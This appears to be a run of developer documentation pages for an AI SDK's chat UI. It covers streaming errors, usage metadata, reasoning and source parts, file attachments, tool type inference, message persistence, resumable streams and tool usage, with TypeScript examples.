With streamText, you can control how error messages and usage information are sent back to the client.
Error Messages
By default, the error message is masked for security reasons.
The default error message is "An error occurred."
You can forward error messages or send your own error message by providing an onError function:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
onError: error => {
if (error == null) {
return 'unknown error';
}
if (typeof error === 'string') {
return error;
}
if (error instanceof Error) {
return error.message;
}
return JSON.stringify(error);
},
});
}
Usage Information
Track token consumption and resource usage with message metadata:
- Define a custom metadata type with usage fields (optional, for type safety)
- Attach usage data using messageMetadata in your response
- Display usage metrics in your UI components
Usage data is attached as metadata to messages and becomes available once the model completes its response generation.
import { openai } from '@ai-sdk/openai';
import {
convertToModelMessages,
streamText,
UIMessage,
type LanguageModelUsage,
} from 'ai';
__PROVIDER_IMPORT__;
// Create a new metadata type (optional for type-safety)
type MyMetadata = {
totalUsage: LanguageModelUsage;
};
// Create a new custom message type with your own metadata
export type MyUIMessage = UIMessage<MyMetadata>;
export async function POST(req: Request) {
const { messages }: { messages: MyUIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
messageMetadata: ({ part }) => {
// Send total usage when generation is finished
if (part.type === 'finish') {
return { totalUsage: part.totalUsage };
}
},
});
}
Then, on the client, you can access the message-level metadata.
'use client';
import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
// Use custom message type defined on the server (optional for type-safety)
const { messages } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts.map(part => {
if (part.type === 'text') {
return part.text;
}
})}
{/* Render usage via metadata */}
{m.metadata?.totalUsage && (
<div>Total usage: {m.metadata?.totalUsage.totalTokens} tokens</div>
)}
</div>
))}
</div>
);
}
You can also access your metadata from the onFinish callback of useChat:
'use client';
import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from './api/chat/route';
import { DefaultChatTransport } from 'ai';
export default function Chat() {
// Use custom message type defined on the server (optional for type-safety)
const { messages } = useChat<MyUIMessage>({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
onFinish: ({ message }) => {
// Access message metadata via onFinish callback
console.log(message.metadata?.totalUsage);
},
});
}
Text Streams
useChat can handle plain text streams by using the TextStreamChatTransport:
'use client';
import { useChat } from '@ai-sdk/react';
import { TextStreamChatTransport } from 'ai';
export default function Chat() {
const { messages } = useChat({
transport: new TextStreamChatTransport({
api: '/api/chat',
}),
});
return <>...</>;
}
This configuration also works with other backend servers that stream plain text. Check out the stream protocol guide for more information.
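For reference, a minimal sketch of a matching server route that streams plain text (using toTextStreamResponse instead of the UI message protocol):
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
});
// Respond with a plain text stream rather than UI message chunks
return result.toTextStreamResponse();
}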
Reasoning
Some models such as DeepSeek deepseek-r1
and Anthropic claude-sonnet-4-5-20250929 support reasoning tokens.
These tokens are typically sent before the message content.
You can forward them to the client with the sendReasoning option:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'deepseek/deepseek-r1',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
On the client side, you can access the reasoning parts of the message object.
Reasoning parts have a text property that contains the reasoning content.
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
// text parts:
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
}
// reasoning parts:
if (part.type === 'reasoning') {
return <pre key={index}>{part.text}</pre>;
}
})}
</div>
));
Some models may also produce files as part of reasoning (e.g. images).
These are available as reasoning-file parts (ReasoningFileUIPart) with
mediaType and url properties, similar to regular file parts.
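A minimal rendering sketch for these parts (assuming the part type string is 'reasoning-file'):
messages.map(message => (
<div key={message.id}>
{message.parts.map((part, index) => {
// reasoning-file parts carry mediaType and url like regular file parts
if (part.type === 'reasoning-file' && part.mediaType.startsWith('image/')) {
return <img key={index} src={part.url} alt="Reasoning output" />;
}
return null;
})}
</div>
));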
Sources
Some providers such as Perplexity and Google include sources in the response.
Currently sources are limited to web pages that ground the response.
You can forward them to the client with the sendSources option:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'perplexity/sonar-pro',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
sendSources: true,
});
}
On the client side, you can access source parts of the message object.
There are two types of sources: source-url for web pages and source-document for documents.
Here is an example that renders both types of sources:
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{/* Render URL sources */}
{message.parts
.filter(part => part.type === 'source-url')
.map(part => (
<span key={`source-${part.id}`}>
[
<a href={part.url} target="_blank">
{part.title ?? new URL(part.url).hostname}
</a>
]
</span>
))}
{/* Render document sources */}
{message.parts
.filter(part => part.type === 'source-document')
.map(part => (
<span key={`source-${part.id}`}>
[<span>{part.title ?? `Document ${part.id}`}</span>]
</span>
))}
</div>
));
Image Generation
Some models such as Google gemini-2.5-flash-image support image generation.
When images are generated, they are exposed as files to the client.
On the client side, you can access file parts of the message object
and render them as images.
messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
} else if (part.type === 'file' && part.mediaType.startsWith('image/')) {
return <img key={index} src={part.url} alt="Generated image" />;
}
})}
</div>
));
Attachments
The useChat hook supports sending file attachments along with a message as well as rendering them on the client. This can be useful for building applications that involve sending images, files, or other media content to the AI provider.
There are two ways to send files with a message: using a FileList object from file inputs or using an array of file objects.
FileList
By using FileList, you can send multiple files as attachments along with a message using the file input element. The useChat hook will automatically convert them into data URLs and send them to the AI provider.
'use client';
import { useChat } from '@ai-sdk/react';
import { useRef, useState } from 'react';
export default function Page() {
const { messages, sendMessage, status } = useChat();
const [input, setInput] = useState('');
const [files, setFiles] = useState<FileList | undefined>(undefined);
const fileInputRef = useRef<HTMLInputElement>(null);
return (
<div>
<div>
{messages.map(message => (
<div key={message.id}>
<div>{`${message.role}: `}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (
part.type === 'file' &&
part.mediaType?.startsWith('image/')
) {
return <img key={index} src={part.url} alt={part.filename} />;
}
return null;
})}
</div>
</div>
))}
</div>
<form
onSubmit={event => {
event.preventDefault();
if (input.trim()) {
sendMessage({
text: input,
files,
});
setInput('');
setFiles(undefined);
if (fileInputRef.current) {
fileInputRef.current.value = '';
}
}
}}
>
<input
type="file"
onChange={event => {
if (event.target.files) {
setFiles(event.target.files);
}
}}
multiple
ref={fileInputRef}
/>
<input
value={input}
placeholder="Send message..."
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
/>
</form>
</div>
);
}
File Objects
You can also send files as objects along with a message. This can be useful for sending pre-uploaded files or data URLs.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { FileUIPart } from 'ai';
export default function Page() {
const { messages, sendMessage, status } = useChat();
const [input, setInput] = useState('');
const [files] = useState<FileUIPart[]>([
{
type: 'file',
filename: 'earth.png',
mediaType: 'image/png',
url: 'https://example.com/earth.png',
},
{
type: 'file',
filename: 'moon.png',
mediaType: 'image/png',
url: 'data:image/png;base64,iVBORw0KGgo...',
},
]);
return (
<div>
<div>
{messages.map(message => (
<div key={message.id}>
<div>{`${message.role}: `}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (
part.type === 'file' &&
part.mediaType?.startsWith('image/')
) {
return <img key={index} src={part.url} alt={part.filename} />;
}
return null;
})}
</div>
</div>
))}
</div>
<form
onSubmit={event => {
event.preventDefault();
if (input.trim()) {
sendMessage({
text: input,
files,
});
setInput('');
}
}}
>
<input
value={input}
placeholder="Send message..."
onChange={e => setInput(e.target.value)}
disabled={status !== 'ready'}
/>
</form>
</div>
);
}
Files generated as part of model reasoning are available as reasoning-file
parts (ReasoningFileUIPart) with the same mediaType and url properties.
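For example, image files produced during reasoning can be rendered much like regular file parts. A minimal sketch, assuming the part type string is 'reasoning-file' as described above:
messages.map(message => (
  <div key={message.id}>
    {message.parts
      .filter(part => part.type === 'reasoning-file')
      .map((part, index) =>
        // only render image media types here:
        part.mediaType.startsWith('image/') ? (
          <img key={index} src={part.url} alt="Reasoning image" />
        ) : null,
      )}
  </div>
));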
Type Inference for Tools
When working with tools in TypeScript, AI SDK UI provides type inference helpers to ensure type safety for your tool inputs and outputs.
InferUITool
The InferUITool type helper infers the input and output types of a single tool for use in UI messages:
import { InferUITool } from 'ai';
import { z } from 'zod';
const weatherTool = {
description: 'Get the current weather',
inputSchema: z.object({
location: z.string().describe('The city and state'),
}),
execute: async ({ location }) => {
return `The weather in ${location} is sunny.`;
},
};
// Infer the types from the tool
type WeatherUITool = InferUITool<typeof weatherTool>;
// This creates a type with:
// {
// input: { location: string };
// output: string;
// }
InferUITools
The InferUITools type helper infers the input and output types of a ToolSet:
import { InferUITools, ToolSet } from 'ai';
import { z } from 'zod';
const tools = {
weather: {
description: 'Get the current weather',
inputSchema: z.object({
location: z.string().describe('The city and state'),
}),
execute: async ({ location }) => {
return `The weather in ${location} is sunny.`;
},
},
calculator: {
description: 'Perform basic arithmetic',
inputSchema: z.object({
operation: z.enum(['add', 'subtract', 'multiply', 'divide']),
a: z.number(),
b: z.number(),
}),
execute: async ({ operation, a, b }) => {
switch (operation) {
case 'add':
return a + b;
case 'subtract':
return a - b;
case 'multiply':
return a * b;
case 'divide':
return a / b;
}
},
},
} satisfies ToolSet;
// Infer the types from the tool set
type MyUITools = InferUITools<typeof tools>;
// This creates a type with:
// {
// weather: { input: { location: string }; output: string };
// calculator: { input: { operation: 'add' | 'subtract' | 'multiply' | 'divide'; a: number; b: number }; output: number };
// }
Using Inferred Types
You can use these inferred types to create a custom UIMessage type and pass it to various AI SDK UI functions:
import { InferUITools, UIMessage, UIDataTypes } from 'ai';
type MyUITools = InferUITools<typeof tools>;
type MyUIMessage = UIMessage<never, UIDataTypes, MyUITools>;
Pass the custom type to useChat or createUIMessageStream:
import { useChat } from '@ai-sdk/react';
import { createUIMessageStream } from 'ai';
import type { MyUIMessage } from './types';
// With useChat
const { messages } = useChat<MyUIMessage>();
// With createUIMessageStream
const stream = createUIMessageStream<MyUIMessage>(/* ... */);
This provides full type safety for tool inputs and outputs on the client and server.
title: Chatbot Message Persistence description: Learn how to store and load chat messages in a chatbot.
Chatbot Message Persistence
Being able to store and load chat messages is crucial for most AI chatbots.
In this guide, we'll show how to implement message persistence with useChat and streamText.
Starting a new chat
When the user navigates to the chat page without providing a chat ID, we need to create a new chat and redirect to the chat page with the new chat ID.
import { redirect } from 'next/navigation';
import { createChat } from '@util/chat-store';
export default async function Page() {
const id = await createChat(); // create a new chat
redirect(`/chat/${id}`); // redirect to chat page, see below
}
Our example chat store implementation uses files to store the chat messages. In a real-world application, you would use a database or a cloud storage service, and get the chat ID from the database. That being said, the function interfaces are designed to be easily replaced with other implementations.
import { generateId } from 'ai';
import { existsSync, mkdirSync } from 'fs';
import { writeFile } from 'fs/promises';
import path from 'path';
export async function createChat(): Promise<string> {
const id = generateId(); // generate a unique chat ID
await writeFile(getChatFile(id), '[]'); // create an empty chat file
return id;
}
function getChatFile(id: string): string {
const chatDir = path.join(process.cwd(), '.chats');
if (!existsSync(chatDir)) mkdirSync(chatDir, { recursive: true });
return path.join(chatDir, `${id}.json`);
}
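Because the interface is small, swapping the storage backend is straightforward. Here is a minimal sketch of the same createChat function backed by an in-memory Map (illustrative only; data is lost on restart):
import { generateId, UIMessage } from 'ai';
// module-level store mapping chat IDs to their messages
const chats = new Map<string, UIMessage[]>();
export async function createChat(): Promise<string> {
  const id = generateId(); // generate a unique chat ID
  chats.set(id, []); // start with an empty message list
  return id;
}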
Loading an existing chat
When the user navigates to the chat page with a chat ID, we need to load the chat messages from storage.
The loadChat function in our file-based chat store is implemented as follows:
import { UIMessage } from 'ai';
import { readFile } from 'fs/promises';
export async function loadChat(id: string): Promise<UIMessage[]> {
return JSON.parse(await readFile(getChatFile(id), 'utf8'));
}
// ... rest of the file
Validating messages on the server
When processing messages on the server that contain tool calls, custom metadata, or data parts, you should validate them using validateUIMessages before sending them to the model.
Validation with tools
When your messages include tool calls, validate them against your tool definitions:
import {
convertToModelMessages,
streamText,
UIMessage,
validateUIMessages,
tool,
} from 'ai';
import { z } from 'zod';
import { loadChat, saveChat } from '@util/chat-store';
import { dataSchemas, metadataSchema } from '@util/schemas';
// Define your tools
const tools = {
weather: tool({
description: 'Get weather information',
inputSchema: z.object({
location: z.string(),
units: z.enum(['celsius', 'fahrenheit']),
}),
execute: async ({ location, units }) => {
/* tool implementation */
},
}),
// other tools
};
export async function POST(req: Request) {
const { message, id } = await req.json();
// Load previous messages from database
const previousMessages = await loadChat(id);
// Append the new message to the previous messages
const messages = [...previousMessages, message];
// Validate loaded messages against
// tools, data parts schema, and metadata schema
const validatedMessages = await validateUIMessages({
messages,
tools, // Ensures tool calls in messages match current schemas
dataSchemas,
metadataSchema,
});
const result = streamText({
model: 'openai/gpt-5-mini',
messages: convertToModelMessages(validatedMessages),
tools,
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
onFinish: ({ messages }) => {
saveChat({ chatId: id, messages });
},
});
}
Handling validation errors
Handle validation errors gracefully when messages from the database don't match current schemas:
import {
convertToModelMessages,
streamText,
validateUIMessages,
TypeValidationError,
} from 'ai';
import { type MyUIMessage } from '@/types';
export async function POST(req: Request) {
const { message, id } = await req.json();
// Load and validate messages from database
let validatedMessages: MyUIMessage[];
try {
const previousMessages = await loadMessagesFromDB(id);
validatedMessages = await validateUIMessages({
// append the new message to the previous messages:
messages: [...previousMessages, message],
tools,
metadataSchema,
});
} catch (error) {
if (error instanceof TypeValidationError) {
// Log validation error for monitoring
console.error('Database messages validation failed:', error);
// Could implement message migration or filtering here
// For now, start with empty history
validatedMessages = [];
} else {
throw error;
}
}
// Continue with validated messages...
}
Displaying the chat
Once messages are loaded from storage, you can display them in your chat UI. Here's how to set up the page component and the chat display:
import { loadChat } from '@util/chat-store';
import Chat from '@ui/chat';
export default async function Page(props: { params: Promise<{ id: string }> }) {
const { id } = await props.params;
const messages = await loadChat(id);
return <Chat id={id} initialMessages={messages} />;
}
The chat component uses the useChat hook to manage the conversation:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport, UIMessage } from 'ai';
import { useState } from 'react';
export default function Chat({
id,
initialMessages,
}: { id?: string | undefined; initialMessages?: UIMessage[] } = {}) {
const [input, setInput] = useState('');
const { sendMessage, messages } = useChat({
id, // use the provided chat ID
messages: initialMessages, // load initial messages
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
// simplified rendering code, extend as needed:
return (
<div>
{messages.map(m => (
<div key={m.id}>
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts
.map(part => (part.type === 'text' ? part.text : ''))
.join('')}
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Type a message..."
/>
<button type="submit">Send</button>
</form>
</div>
);
}
Storing messages
useChat sends the chat id and the messages to the backend.
When loading messages from storage that contain tools, metadata, or custom data
parts, validate them using validateUIMessages before processing (see the
validation section above).
Storing messages is done in the onFinish callback of the toUIMessageStreamResponse function.
onFinish receives the complete messages including the new AI response as UIMessage[].
import { openai } from '@ai-sdk/openai';
import { saveChat } from '@util/chat-store';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
await req.json();
const result = streamText({
model: 'openai/gpt-5-mini',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
onFinish: ({ messages }) => {
saveChat({ chatId, messages });
},
});
}
The actual storage of the messages is done in the saveChat function, which in
our file-based chat store is implemented as follows:
import { UIMessage } from 'ai';
import { writeFile } from 'fs/promises';
export async function saveChat({
chatId,
messages,
}: {
chatId: string;
messages: UIMessage[];
}): Promise<void> {
const content = JSON.stringify(messages, null, 2);
await writeFile(getChatFile(chatId), content);
}
// ... rest of the file
Message IDs
In addition to a chat ID, each message has an ID. You can use this message ID to e.g. manipulate individual messages.
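For example, here is a minimal sketch that removes a single message by its ID, assuming you use the setMessages helper returned by useChat:
const { messages, setMessages } = useChat();
// remove one message by its ID:
const deleteMessage = (messageId: string) => {
  setMessages(messages.filter(message => message.id !== messageId));
};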
Client-side vs Server-side ID Generation
By default, message IDs are generated client-side:
- User message IDs are generated by the useChat hook on the client
- AI response message IDs are generated by streamText on the server
For applications without persistence, client-side ID generation works perfectly. However, for persistence, you need server-side generated IDs to ensure consistency across sessions and prevent ID conflicts when messages are stored and retrieved.
Setting Up Server-side ID Generation
When implementing persistence, you have two options for generating server-side IDs:
- Using generateMessageId in toUIMessageStreamResponse
- Setting IDs in your start message part with createUIMessageStream
Option 1: Using generateMessageId in toUIMessageStreamResponse
You can control the ID format by providing ID generators using createIdGenerator():
import { createIdGenerator, streamText } from 'ai';
export async function POST(req: Request) {
// ...
const result = streamText({
// ...
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
// Generate consistent server-side IDs for persistence:
generateMessageId: createIdGenerator({
prefix: 'msg',
size: 16,
}),
onFinish: ({ messages }) => {
saveChat({ chatId, messages });
},
});
}
Option 2: Setting IDs with createUIMessageStream
Alternatively, you can use createUIMessageStream to control the message ID by writing a start message part:
import {
generateId,
streamText,
createUIMessageStream,
createUIMessageStreamResponse,
} from 'ai';
export async function POST(req: Request) {
const { messages, chatId } = await req.json();
const stream = createUIMessageStream({
execute: async ({ writer }) => {
// Write start message part with custom ID
writer.write({
type: 'start',
messageId: generateId(), // Generate server-side ID for persistence
});
const result = streamText({
model: 'openai/gpt-5-mini',
messages: await convertToModelMessages(messages),
});
writer.merge(result.toUIMessageStream({ sendStart: false })); // omit start message part
},
originalMessages: messages,
onFinish: ({ responseMessage }) => {
// save your chat here
},
});
return createUIMessageStreamResponse({ stream });
}
You can also control the format of the user message IDs that are generated on the client by passing a generateId function to useChat:
import { createIdGenerator } from 'ai';
import { useChat } from '@ai-sdk/react';
const { ... } = useChat({
generateId: createIdGenerator({
prefix: 'msgc',
size: 16,
}),
// ...
});
Sending only the last message
Once you have implemented message persistence, you might want to send only the last message to the server. This reduces the amount of data sent to the server on each request and can improve performance.
To achieve this, you can provide a prepareSendMessagesRequest function to the transport.
This function receives the messages and the chat ID, and returns the request body to be sent to the server.
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
const {
// ...
} = useChat({
// ...
transport: new DefaultChatTransport({
api: '/api/chat',
// only send the last message to the server:
prepareSendMessagesRequest({ messages, id }) {
return { body: { message: messages[messages.length - 1], id } };
},
}),
});
On the server, you can then load the previous messages and append the new message to the previous messages. If your messages contain tools, metadata, or custom data parts, you should validate them:
import { convertToModelMessages, UIMessage, validateUIMessages } from 'ai';
// import your tools and schemas
export async function POST(req: Request) {
// get the last message from the client:
const { message, id } = await req.json();
// load the previous messages from the server:
const previousMessages = await loadChat(id);
// validate messages if they contain tools, metadata, or data parts:
const validatedMessages = await validateUIMessages({
// append the new message to the previous messages:
messages: [...previousMessages, message],
tools, // if using tools
metadataSchema, // if using custom metadata
dataSchemas, // if using custom data parts
});
const result = streamText({
// ...
messages: convertToModelMessages(validatedMessages),
});
return result.toUIMessageStreamResponse({
originalMessages: validatedMessages,
onFinish: ({ messages }) => {
saveChat({ chatId: id, messages });
},
});
}
Handling client disconnects
By default, the AI SDK streamText function applies backpressure to the language model provider to prevent
the consumption of tokens that have not yet been requested.
However, this means that when the client disconnects, e.g. by closing the browser tab or because of a network issue, the stream from the LLM will be aborted and the conversation may end up in a broken state.
Assuming that you have a storage solution in place, you can use the consumeStream method to consume the stream on the backend,
and then save the result as usual.
consumeStream effectively removes the backpressure,
meaning that the result is stored even when the client has already disconnected.
import { convertToModelMessages, streamText, UIMessage } from 'ai';
import { saveChat } from '@util/chat-store';
export async function POST(req: Request) {
const { messages, chatId }: { messages: UIMessage[]; chatId: string } =
await req.json();
const result = streamText({
model: 'openai/gpt-5-mini',
messages: await convertToModelMessages(messages),
});
// consume the stream to ensure it runs to completion & triggers onFinish
// even when the client response is aborted:
result.consumeStream(); // no await
return result.toUIMessageStreamResponse({
originalMessages: messages,
onFinish: ({ messages }) => {
saveChat({ chatId, messages });
},
});
}
When the client reloads the page after a disconnect, the chat will be restored from the storage solution.
For more robust handling of disconnects, you may want to add resumability on disconnects. Check out the Chatbot Resume Streams documentation to learn more.
title: Chatbot Resume Streams description: Learn how to resume chatbot streams after client disconnects.
Chatbot Resume Streams
useChat supports resuming ongoing streams after page reloads. Use this feature to build applications with long-running generations.
How stream resumption works
Stream resumption requires persistence for messages and active streams in your application. The AI SDK provides tools to connect to storage, but you need to set up the storage yourself.
The AI SDK provides:
- A resume option in useChat that automatically reconnects to active streams
- Access to the outgoing stream through the consumeSseStream callback
- Automatic HTTP requests to your resume endpoints
You build:
- Storage to track which stream belongs to each chat
- Redis to store the UIMessage stream
- Two API endpoints: POST to create streams, GET to resume them
- Integration with resumable-stream to manage Redis storage
Prerequisites
To implement resumable streams in your chat application, you need:
- The resumable-stream package - Handles the publisher/subscriber mechanism for streams
- A persistence layer - Tracks which stream ID is active for each chat (e.g. database)
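For example, you can add the resumable-stream package with your package manager of choice:
pnpm add resumable-stream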
Implementation
1. Client-side: Enable stream resumption
Use the resume option in the useChat hook to enable stream resumption. When resume is true, the hook automatically attempts to reconnect to any active stream for the chat on mount:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport, type UIMessage } from 'ai';
export function Chat({
chatData,
resume = false,
}: {
chatData: { id: string; messages: UIMessage[] };
resume?: boolean;
}) {
const { messages, sendMessage, status } = useChat({
id: chatData.id,
messages: chatData.messages,
resume, // Enable automatic stream resumption
transport: new DefaultChatTransport({
// You must send the id of the chat
prepareSendMessagesRequest: ({ id, messages }) => {
return {
body: {
id,
message: messages[messages.length - 1],
},
};
},
}),
});
return <div>{/* Your chat UI */}</div>;
}
When you enable resume, the useChat hook makes a GET request to /api/chat/[id]/stream on mount to check for and resume any active streams.
Let's start by creating the POST handler to create the resumable stream.
2. Create the POST handler
The POST handler creates resumable streams using the consumeSseStream callback:
import { openai } from '@ai-sdk/openai';
import { readChat, saveChat } from '@util/chat-store';
import {
convertToModelMessages,
generateId,
streamText,
type UIMessage,
} from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';
export async function POST(req: Request) {
const {
message,
id,
}: {
message: UIMessage | undefined;
id: string;
} = await req.json();
const chat = await readChat(id);
let messages = chat.messages;
messages = [...messages, message!];
// Clear any previous active stream and save the user message
saveChat({ id, messages, activeStreamId: null });
const result = streamText({
model: 'openai/gpt-5-mini',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
generateMessageId: generateId,
onFinish: ({ messages }) => {
// Clear the active stream when finished
saveChat({ id, messages, activeStreamId: null });
},
async consumeSseStream({ stream }) {
const streamId = generateId();
// Create a resumable stream from the SSE stream
const streamContext = createResumableStreamContext({ waitUntil: after });
await streamContext.createNewResumableStream(streamId, () => stream);
// Update the chat with the active stream ID
saveChat({ id, activeStreamId: streamId });
},
});
}
3. Implement the GET handler
Create a GET handler at /api/chat/[id]/stream that:
- Reads the chat ID from the route params
- Loads the chat data to check for an active stream
- Returns 204 (No Content) if no stream is active
- Resumes the existing stream if one is found
import { readChat } from '@util/chat-store';
import { UI_MESSAGE_STREAM_HEADERS } from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';
export async function GET(
_: Request,
{ params }: { params: Promise<{ id: string }> },
) {
const { id } = await params;
const chat = await readChat(id);
if (chat.activeStreamId == null) {
// no content response when there is no active stream
return new Response(null, { status: 204 });
}
const streamContext = createResumableStreamContext({
waitUntil: after,
});
return new Response(
await streamContext.resumeExistingStream(chat.activeStreamId),
{ headers: UI_MESSAGE_STREAM_HEADERS },
);
}
How it works
Request lifecycle
[Diagram: request lifecycle of a resumable stream]
The diagram above shows the complete lifecycle of a resumable stream:
- Stream creation: When you send a new message, the POST handler uses streamText to generate the response. The consumeSseStream callback creates a resumable stream with a unique ID and stores it in Redis through the resumable-stream package
- Stream tracking: Your persistence layer saves the activeStreamId in the chat data
- Client reconnection: When the client reconnects (page reload), the resume option triggers a GET request to /api/chat/[id]/stream
- Stream recovery: The GET handler checks for an activeStreamId and uses resumeExistingStream to reconnect. If no active stream exists, it returns a 204 (No Content) response
- Completion cleanup: When the stream finishes, the onFinish callback clears the activeStreamId by setting it to null
Customize the resume endpoint
By default, the useChat hook makes a GET request to /api/chat/[id]/stream when resuming. You can customize this endpoint, credentials, and headers using the prepareReconnectToStreamRequest option in DefaultChatTransport:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
export function Chat({ chatData, resume }) {
const { messages, sendMessage } = useChat({
id: chatData.id,
messages: chatData.messages,
resume,
transport: new DefaultChatTransport({
// Customize reconnect settings (optional)
prepareReconnectToStreamRequest: ({ id }) => {
return {
api: `/api/chat/${id}/stream`, // Default pattern
// Or use a different pattern:
// api: `/api/streams/${id}/resume`,
// api: `/api/resume-chat?id=${id}`,
credentials: 'include', // Include cookies/auth
headers: {
Authorization: 'Bearer token',
'X-Custom-Header': 'value',
},
};
},
}),
});
return <div>{/* Your chat UI */}</div>;
}
This lets you:
- Match your existing API route structure
- Add query parameters or custom paths
- Integrate with different backend architectures
Important considerations
- Incompatibility with abort: Stream resumption is not compatible with abort functionality. Closing a tab or refreshing the page triggers an abort signal that will break the resumption mechanism. Do not use resume: true if you need abort functionality in your application
- Stream expiration: Streams in Redis expire after a set time (configurable in the resumable-stream package)
- Multiple clients: Multiple clients can connect to the same stream simultaneously
- Error handling: When no active stream exists, the GET handler returns a 204 (No Content) status code
- Security: Ensure proper authentication and authorization for both creating and resuming streams
- Race conditions: Clear the activeStreamId when starting a new stream to prevent resuming outdated streams
title: Chatbot Tool Usage description: Learn how to use tools with the useChat hook.
Chatbot Tool Usage
With useChat and streamText, you can use tools in your chatbot application.
The AI SDK supports three types of tools in this context:
- Automatically executed server-side tools
- Automatically executed client-side tools
- Tools that require user interaction, such as confirmation dialogs
The flow is as follows:
- The user enters a message in the chat UI.
- The message is sent to the API route.
- In your server-side route, the language model generates tool calls during the streamText call.
- All tool calls are forwarded to the client.
- Server-side tools are executed using their execute method and their results are forwarded to the client.
- Client-side tools that should be automatically executed are handled with the onToolCall callback. You must call addToolOutput to provide the tool result.
- Client-side tools that require user interaction can be displayed in the UI. The tool calls and results are available as tool invocation parts in the parts property of the last assistant message.
- When the user interaction is done, addToolOutput can be used to add the tool result to the chat.
- The chat can be configured to automatically submit when all tool results are available using sendAutomaticallyWhen. This triggers another iteration of this flow.
The tool calls and tool executions are integrated into the assistant message as typed tool parts. A tool part is at first a tool call, and then it becomes a tool result when the tool is executed. The tool result contains all information about the tool call as well as the result of the tool execution.
Example
In this example, we'll use three tools:
- getWeatherInformation: An automatically executed server-side tool that returns the weather in a given city.
- askForConfirmation: A user-interaction client-side tool that asks the user for confirmation.
- getLocation: An automatically executed client-side tool that returns a random city.
API route
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: await convertToModelMessages(messages),
tools: {
// server-side tool with execute function:
getWeatherInformation: {
description: 'show the weather in a given city to the user',
inputSchema: z.object({ city: z.string() }),
execute: async ({}: { city: string }) => {
const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
return weatherOptions[
Math.floor(Math.random() * weatherOptions.length)
];
},
},
// client-side tool that starts user interaction:
askForConfirmation: {
description: 'Ask the user for confirmation.',
inputSchema: z.object({
message: z.string().describe('The message to ask for confirmation.'),
}),
},
// client-side tool that is automatically executed on the client:
getLocation: {
description:
'Get the user location. Always ask for confirmation before using this tool.',
inputSchema: z.object({}),
},
},
});
return result.toUIMessageStreamResponse();
}
Client-side page
The client-side page uses the useChat hook to create a chatbot application with real-time message streaming.
Tool calls are displayed in the chat UI as typed tool parts.
Please make sure to render the messages using the parts property of the message.
There are three things worth mentioning:
- The onToolCall callback is used to handle client-side tools that should be automatically executed. In this example, the getLocation tool is a client-side tool that returns a random city. You call addToolOutput to provide the result (without await to avoid potential deadlocks).
- The sendAutomaticallyWhen option with the lastAssistantMessageIsCompleteWithToolCalls helper automatically submits when all tool results are available.
